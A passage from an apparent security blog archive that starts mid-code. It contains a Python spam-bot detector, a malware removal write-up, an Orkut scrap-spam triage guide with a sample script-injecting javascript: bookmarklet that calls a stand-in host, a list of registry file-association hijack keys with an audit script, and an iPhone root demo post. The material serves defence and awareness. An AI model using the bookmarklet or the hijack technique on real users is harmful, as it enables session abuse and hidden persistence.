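MX_LABEL = re.compile(r"^(i?mxs?\d*|mailin-?\d*|maila)$")

# The names the infected box resolved, copied from the list above.
INFECTED_QUERIES = [
    "mailin-01.mx.aol.com", "mailin-02.mx.aol.com", "mailin-03.mx.aol.com",
    "mailin-04.mx.aol.com", "mxs.mail.ru", "mx1.yandex.ru", "mx2.yandex.ru",
    "imx1.rambler.ru", "c.mx.mail.yahoo.com", "d.mx.mail.yahoo.com",
    "maila.microsoft.com", "bl.spamcop.net", "cbl.abuseat.org", "list.dsbl.org",
    "sbl-xbl.spamhaus.org", "zen.spamhaus.org", "combined.njabl.org",
    "multihop.dsbl.org", "blackholes.uceb.org", "bl.csma.biz", "db.wpbl.info",
    "dnsbl.njabl.org",
]
# Constructed log ("<kind> <src_ip> <qname|dst_ip:port>"): 192.168.1.50 is the
# infected workstation, .10 the site's real mail server, .20 a clean client.
SAMPLE_LOG = (
    ["dns 192.168.1.20 www.example.com", "dns 192.168.1.10 mx.example.net",
     "tcp 192.168.1.10 203.0.113.9:25"]
    + ["dns 192.168.1.50 " + name for name in INFECTED_QUERIES]
    + ["tcp 192.168.1.50 203.0.113.10:25", "tcp 192.168.1.50 203.0.113.11:25"]
)


def classify_name(qname):
    """'dnsbl' for a blocklist zone, 'mx' for a provider mail exchanger, else 'other'."""
    labels = qname.lower().rstrip(".").split(".")
    if ".".join(labels[-2:]) in DNSBL_ZONES:
        return "dnsbl"
    if any(MX_LABEL.match(label) for label in labels[:-2]):
        return "mx"
    return "other"


def summarize(log_lines, known_mtas=frozenset()):
    """Per source IP: MX names resolved, DNSBL zones queried, direct SMTP peers."""
    per_host = defaultdict(lambda: {"mx": set(), "dnsbl": set(), "smtp": set()})
    for line in log_lines:
        parts = line.split()
        if len(parts) != 3:
            continue
        kind, src, target = parts
        if kind == "dns":
            cls = classify_name(target)
            if cls != "other":
                per_host[src][cls].add(target)
        elif kind == "tcp":
            dst, _, port = target.rpartition(":")
            # Only a real MTA should talk to port 25 on the internet directly.
            if port == "25" and src not in known_mtas:
                per_host[src]["smtp"].add(dst)
    return per_host


def spam_bot_verdicts(log_lines, known_mtas=frozenset(), min_mx=3):
    """Flag hosts showing at least two of the three spam-bot behaviours."""
    verdicts = {}
    for src, seen in summarize(log_lines, known_mtas).items():
        reasons = []
        if len(seen["mx"]) >= min_mx:
            reasons.append("resolved %d provider MX hosts" % len(seen["mx"]))
        if seen["dnsbl"]:
            reasons.append("queried %d DNS blocklists (self-check)" % len(seen["dnsbl"]))
        if seen["smtp"]:
            reasons.append("direct TCP/25 to %d external hosts" % len(seen["smtp"]))
        if len(reasons) >= 2:
            verdicts[src] = reasons
    return verdicts


if __name__ == "__main__":
    for host, why in spam_bot_verdicts(SAMPLE_LOG, known_mtas={"192.168.1.10"}).items():
        print(host, "->", "; ".join(why))
```

Requiring two independent behaviours keeps a legitimate mail server (which resolves MX hosts and speaks SMTP, but is in `known_mtas`) and an admin testing a blocklist by hand out of the verdict; on a real network, feed it the DNS server's query log and the firewall's outbound connection log instead of the constructed lines.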

Decoded Javascript

One of the contacted domains was “mattfoll.eu.interia.pl”. The malware downloaded an index.html file from this domain; the HTML was obfuscated with JavaScript. The following screenshots show the series of decoded JavaScript stages, which attempted to download another whole set of new malware.

Attempt to inject iframe

Since none of the requested file locations were still valid, the malware could not download the files, and the analysis stopped there.

A simple whois query showed that the malware was contacting a Russian web server. Because the malicious files had already been removed from the domain, it did not appear on any blacklist of malicious domains.

Malware Home

Removal of Fun.exe and Winbafcra.exe

  1. Kill the process tree started by fun.exe.
  2. Delete all 7 binaries created by the malware from their locations.
  3. Delete the added registry entries using a third-party registry editor such as Registry Workshop.
  4. If the antivirus was disabled, re-enable it (or install one) and scan the whole system for traces of the malware.
  5. AVG has provided a standalone utility to clean infected systems. You can download the utility here and remove the infection.

Safety Measures:

  • Do not use Internet Explorer for browsing the internet.
  • Do not click on links in emails or IMs received from untrusted senders.
  • Update your antivirus every day and scan your system periodically to stay safe.

Download Analysis:

I took many screenshots and saved the output of various tools while analyzing this malware. Posting all of that material would have made the post too long, so I am providing the analysis as a tarball for download.

Download Analysis Files. The tarball contains:

  • Outbound connections of the worm, as a Wireshark packet capture
  • Regmon output
  • Strings from memory
  • Some screenshots taken during the analysis
  • File Size: 616 KB
  • MD5 Hash: 3e23d63c7642d6eb1f1c47de2a73870b

Sipera VIPER Lab is in the news again, this time by targeting Microsoft's award-winning UC solution. VIPER Lab released the first Microsoft Office Communication Server Assessment Tool (OAT) at VoiceCon 2009 in Orlando. The tool was developed to help IT managers and security practitioners evaluate the security architecture of their deployments and ensure that their mission-critical communications and systems are protected.


The tool is written entirely in C# and released under the BSD License. It has a user-friendly GUI with the following features:

  • Online Dictionary Attack
  • Presence Stealing
  • Contact List Stealing
  • Single User Flood Mode
  • Domain Flood Mode
  • Call Walk
  • Play Spam Audio
  • Detailed Report Generation

A detailed description of what these features are and how they can be used can be found here.

Once the online dictionary attack succeeds against the target user, the attacker can launch the other attacks against the users configured on the Communication Server, or against the roaming contacts of the target user, depending on the OAT attack mode.

According to the OAT documentation, OAT works in two different scenarios:

  • Internal Network Attack Mode
    • OAT sits inside the corporate network, connects directly to the Front End pool servers and authenticates against Active Directory, simulating an internal attacker.
  • External Network Attack Mode
    • OAT is launched from anywhere on the internet and connects to the Access Edge Server for presence and IM; it still authenticates against Active Directory, and uses the A/V Edge Server for the other assessment features.

With the release of OAT, it is clear that security researchers are gearing up for Microsoft's UC solution.

Originally posted 2009-04-02 18:58:17.

Hi all,

Have you ever used a script in Orkut to send a common scrap to all of your friends? You found it cool, right? It is cool while you are using it for, say, thanking all your friends for birthday wishes or wishing them a Happy New Year, but it is irritating when you receive junk scraps from a known or unknown friend. These tempting but junk scraps are nothing but spam.

These days Orkut spam is increasing. Lots of people are falling prey to tempting scraps (“album hack”, “crush finder” etc.). Without thinking, they click on the link and end up disappointed. Nothing happens in front of their eyes, but they never realise that a lot has already happened in the background.

Some time back I came across the Angelina Jolie movie “Beowulf”, whose tagline is “Temptation is a curse”.
Many people are tempted to view locked profiles; sometimes I am too ;)

(FYI: the album hack does not work anymore. To my knowledge, it has been patched.)

People clicking on the link never realise how much they are contributing to spreading spam.
Let's face it, people never read the security tips the Orkut team puts on their home pages, but they always read “Today's Fortune” ;)

Now the question is how to stop (or, since that is difficult, at least slow down) scrap spammers.
Here are some steps that even a layman can understand and use to put a brake on spammers.

1) Every time you get a link in a scrap, be suspicious of it at first glance.
2) Don't click on the link directly. Instead, right-click on the link and choose “Copy Link Location” from the context menu (if the link is not displayed in the scrap); otherwise just copy the displayed link.
3) Open Notepad or any text editor and paste the link there. It might look like this:
javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://somedomain.com/somescript.js';void(0)

This is a bookmarklet: the javascript: scheme runs the code inside the Orkut page you are on, and the code injects a <script> element that loads an external script, which then acts with your logged-in session.

4) Now copy the URL assigned to c.src (here “http://somedomain.com/somescript.js”, without the quotes) and paste it into the browser's address bar in a new tab.
5) This will either show you some source code or give you a pop-up box to download the file.
6) In case of a download pop-up, save the file to disk and open it in Notepad. If the browser shows the source code, there is no need to download the file.
7) Search for strings like scrapall, sendscrap, scrapbook.aspx, cmm_join etc. If any of the listed words is present in the .js file, delete the file from the hard drive and delete the scrap without clicking the link.
In most cases you will find these words. People with JavaScript knowledge can dig deeper into the script and find out how it works.

If the .js file name is orkutx.js, freecall.js or users.js, delete the scrap and delete the file from the hard drive. Sometimes the link in a scrap is nothing but an Orkut user profile or community profile.
I would like to encourage users to report such profiles and communities as abuse and choose Spam as the category.
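Steps 2 to 7 can be scripted. The Python below is an added example, not something from the original post: it pulls the script URL out of a javascript: link, applies the string and file-name checks from step 7 to the downloaded script, and gives a verdict. The sample link and script body are constructed for illustration (not a real Orkut worm), and `fetch` is a caller-supplied function; the example passes a lambda that returns the embedded script so it runs offline.

```python
import re

# Grabs the URL assigned to .src inside a javascript: link (straight or curly quotes).
SRC_RE = re.compile(r"""\.src\s*=\s*(['"\u2018\u2019])(.*?)\1""")
# Strings from the post that mark a scrap-spamming script.
INDICATORS = ("scrapall", "sendscrap", "scrapbook.aspx", "cmm_join")
# Script names the post says to treat as spam on sight.
KNOWN_BAD_NAMES = ("orkutx.js", "freecall.js", "users.js")

# Constructed samples: a scrap link as it would be pasted into Notepad,
# and the kind of script body it pulls in. Neither is a real Orkut worm.
SAMPLE_LINK = ("javascript:d=document;c=d.createElement('script');"
               "d.body.appendChild(c);c.src='http://somedomain.com/somescript.js';void(0)")
SAMPLE_SCRIPT = """
var friends = document.getElementsByClassName('listItem');
for (var i = 0; i < friends.length; i++) { sendscrap(friends[i], 'check this: ' + location.href); }
function cmm_join(id) { /* joins a community without asking */ }
"""


def extract_script_urls(link):
    """Return the external script URLs a javascript: link loads; [] for ordinary links."""
    if not link.strip().lower().startswith("javascript:"):
        return []
    return [m.group(2) for m in SRC_RE.finditer(link)]


def triage_script(url, body):
    """Apply the post's step-7 checks to a downloaded script body."""
    hits = sorted(word for word in INDICATORS if word in body)
    name = url.rsplit("/", 1)[-1].split("?", 1)[0].lower()
    bad_name = name in KNOWN_BAD_NAMES
    if hits or bad_name:
        verdict = "spam: delete the file and the scrap, do not click"
    else:
        verdict = "no known indicators; review the script manually"
    return {"url": url, "indicators": hits, "known_bad_name": bad_name, "verdict": verdict}


def triage_scrap(link, fetch):
    """Run the whole procedure for one scrap link; fetch(url) returns the script text."""
    urls = extract_script_urls(link)
    if not urls:
        return [{"url": link, "indicators": [], "known_bad_name": False,
                 "verdict": "not a javascript: link; a profile or community link to check by hand"}]
    return [triage_script(url, fetch(url)) for url in urls]


if __name__ == "__main__":
    for result in triage_scrap(SAMPLE_LINK, lambda url: SAMPLE_SCRIPT):
        print(result)
```

The string match is deliberately naive, exactly like searching in Notepad: an obfuscated script (string splitting, eval of encoded text) will pass it, which is why step 7 ends with "dig deeper" rather than "trust the grep".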

I know the procedure is a bit lengthy and needs time, especially for non-techie people, but I guess it is worth spending 5-10 minutes rather than joining 20-25 communities you cannot leave, or installing spyware on your system and risking your Orkut account just by clicking.

The following video shows how fast an Orkut worm spreads.

Video: http://www.youtube.com/watch?v=lS1P9kdg3_8

Originally posted 2008-04-19 03:00:53.

My last post was about the ADS technique adopted by viruses and rootkits: they can use Alternate Data Streams to hide themselves behind legitimate files. I also briefly mentioned getting suspicious whenever you see a new entry in the registry keys used to start programs with the operating system. In this post I am going to extend that and write about some registry locations that virus writers can use to execute a virus or rootkit whenever a file such as a .txt, .jpg or .bin file is opened.

Every file type has a program associated with it: a .txt file is usually opened in Notepad.exe, while .mp3 files are opened in Windows Media Player.

Now the question is: how does Windows know that when the user wants to open “file.txt”, it should launch notepad.exe with “file.txt” as its argument?

The answer is that Windows maintains file type associations in the registry. The HKEY_CLASSES_ROOT hive holds all the file types and their respective associations.

Let's take an example. Say we have created a new file type, .abc, which only our software can read, and we want it associated with our software. All we need to do is add a new key named .abc under HKEY_CLASSES_ROOT, whose default value names the handler (the ProgID), as shown below.

The next step is to add another key, “abcfile”, in the same location and add subkeys under it as shown below.

New_file_Exension

Of all the subkeys, “shell” is the important one. The path to the executable given in the “command” subkey under “shell\open” is what gets associated with the .abc file: whenever the user opens a file with the .abc extension, MySoftware.exe is launched automatically with that file as its argument. Whatever is placed in that command line runs every time such a file is opened, which is exactly why malware tampers with it.

The following entries are also involved in file type association and execution. If a program is taking extra time to launch an associated file, it is worth inspecting the registry entries above and below for ADS or traces of viruses.

HKEY_CLASSES_ROOT\comfile\shell\open\command
HKEY_CLASSES_ROOT\batfile\shell\open\command
HKEY_CLASSES_ROOT\htafile\shell\open\command
HKEY_CLASSES_ROOT\piffile\shell\open\command
HKEY_LOCAL_MACHINE\Software\CLASSES\comfile\shell\open\command
HKEY_LOCAL_MACHINE\Software\CLASSES\htafile\shell\open\command
HKEY_LOCAL_MACHINE\Software\CLASSES\batfile\shell\open\command
HKEY_LOCAL_MACHINE\Software\CLASSES\piffile\shell\open\command
HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open\command
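To make the layout concrete and to check the handler keys listed above, here is an added Python example (not from the original post). It parses a .reg export, such as `reg export HKCR\exefile exefile.reg` produces, resolves the .abc example from above through its ProgID to the command line, and compares the exefile/comfile/batfile/piffile handlers against their stock `"%1" %*` values. The export is constructed, the hijacked command name is made up, and the stock values are an assumption to verify against a known-clean machine.

```python
import re

# Stock handler commands for the executable file types the post lists.
# Assumption: these are the defaults on a clean XP-era box; confirm against
# a known-clean machine before treating a mismatch as an infection.
EXPECTED_COMMANDS = {
    r"HKEY_CLASSES_ROOT\exefile\shell\open\command": '"%1" %*',
    r"HKEY_CLASSES_ROOT\comfile\shell\open\command": '"%1" %*',
    r"HKEY_CLASSES_ROOT\batfile\shell\open\command": '"%1" %*',
    r"HKEY_CLASSES_ROOT\piffile\shell\open\command": '"%1" %*',
}

# Constructed .reg export holding the post's .abc example plus one hijacked
# exefile handler. "hypothetical_hijack.exe" is a made-up name, not a file
# mentioned anywhere on this page.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\.abc]
@="abcfile"

[HKEY_CLASSES_ROOT\abcfile]
@="ABC Document"

[HKEY_CLASSES_ROOT\abcfile\shell\open\command]
@="\"C:\\Program Files\\MySoftware\\MySoftware.exe\" \"%1\""

[HKEY_CLASSES_ROOT\comfile\shell\open\command]
@="\"%1\" %*"

[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="\"C:\\WINDOWS\\hypothetical_hijack.exe\" \"%1\" %*"
"""


def parse_reg(text):
    """Parse a .reg export into {key: {value_name: data}} (string values only)."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current and "=" in line and not line.startswith(";"):
            name, _, data = line.partition("=")
            name = "(Default)" if name == "@" else name.strip('"')
            if data.startswith('"') and data.endswith('"'):
                # .reg escapes backslash and double quote with a backslash.
                keys[current][name] = re.sub(r"\\(.)", r"\1", data[1:-1])
    return keys


def handler_for_extension(keys, ext):
    """Follow HKCR\\<ext> (Default) -> ProgID -> shell\\open\\command, as Explorer does."""
    progid = keys.get(r"HKEY_CLASSES_ROOT\%s" % ext, {}).get("(Default)")
    if not progid:
        return None
    return keys.get(r"HKEY_CLASSES_ROOT\%s\shell\open\command" % progid, {}).get("(Default)")


def audit_handlers(keys, expected=EXPECTED_COMMANDS):
    """Return (key, actual_command) for each listed handler that differs from its stock value."""
    findings = []
    for key, want in expected.items():
        got = keys.get(key, {}).get("(Default)")
        if got is not None and got.strip().lower() != want.lower():
            findings.append((key, got))
    return findings


if __name__ == "__main__":
    import sys
    # reg.exe writes exports as UTF-16 with a BOM; the sample is plain text.
    text = open(sys.argv[1], encoding="utf-16").read() if len(sys.argv) > 1 else SAMPLE_REG
    keys = parse_reg(text)
    print(".abc opens with:", handler_for_extension(keys, ".abc"))
    for key, cmd in audit_handlers(keys):
        print("SUSPICIOUS", key, "=", cmd)
```

The HKEY_LOCAL_MACHINE\Software\Classes copies in the list above are the machine-wide source of the same values, so export and audit both; a hijack that keeps `"%1" %*` at the end of the command still launches the original program, which is what makes this persistence easy to miss from the user's chair.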

Don't forget to open and review the following files too:
1) Winstart.bat: Windows executes all the instructions in this file at startup.
2) WIN.ini: Windows executes the programs listed on the lines starting with run= or load= in the [windows] section.

These are not the only ways to execute programs at startup, but they are among the most common and easiest to implement. I hope this post makes you aware of some of the techniques that can be used to launch programs at Windows startup and gives you a hint on how to check whether your computer is infected with a virus or rootkit.

Originally posted 2008-06-18 06:47:59.

24 Sep 2009

iPhone Hacking Video: iSpit V1.5

Author: bughira | Filed under: Information Security, iPhone

Hi,

As I said in my last blog post, iSpit can allow a remote user to gain root access to the iPhone; here I am going to show you how easily one can gain root access and do whatever s/he wants on your iPhone.

In the following video, I changed the default root password of my iPhone from alpine to password. This is to show that even if people have changed the default password, it is easy to crack. Choosing a weak root password also helps finish the video demo quickly.

If you have read my previous blog post about changing the root password of the iPhone, you will know that the iPhone password cannot be longer than 8 characters (the traditional DES-based crypt(3) hash used for the root account only looks at the first 8 characters). So we should assume that an attacker can always crack the password using freely available password cracking tools like John the Ripper, Cain & Abel, etc.

In the demo network shown in the video there were two iPhones: one locked and activated with AT&T, and the other unlocked, jailbroken and installed with iSpit V1.5.

Video: http://video.google.com/googleplayer.swf?docId=-2848727205364577090

I know the video quality is poor; please bear with it. You can watch a better-quality video at milw0rm: follow this link and search for bughira.

I hope you enjoyed the video and are now in a position to decide: should you install iSpit on your iPhone or not?

Let me know if you have any questions/comments about the video.

Originally posted 2008-05-03 17:48:49.
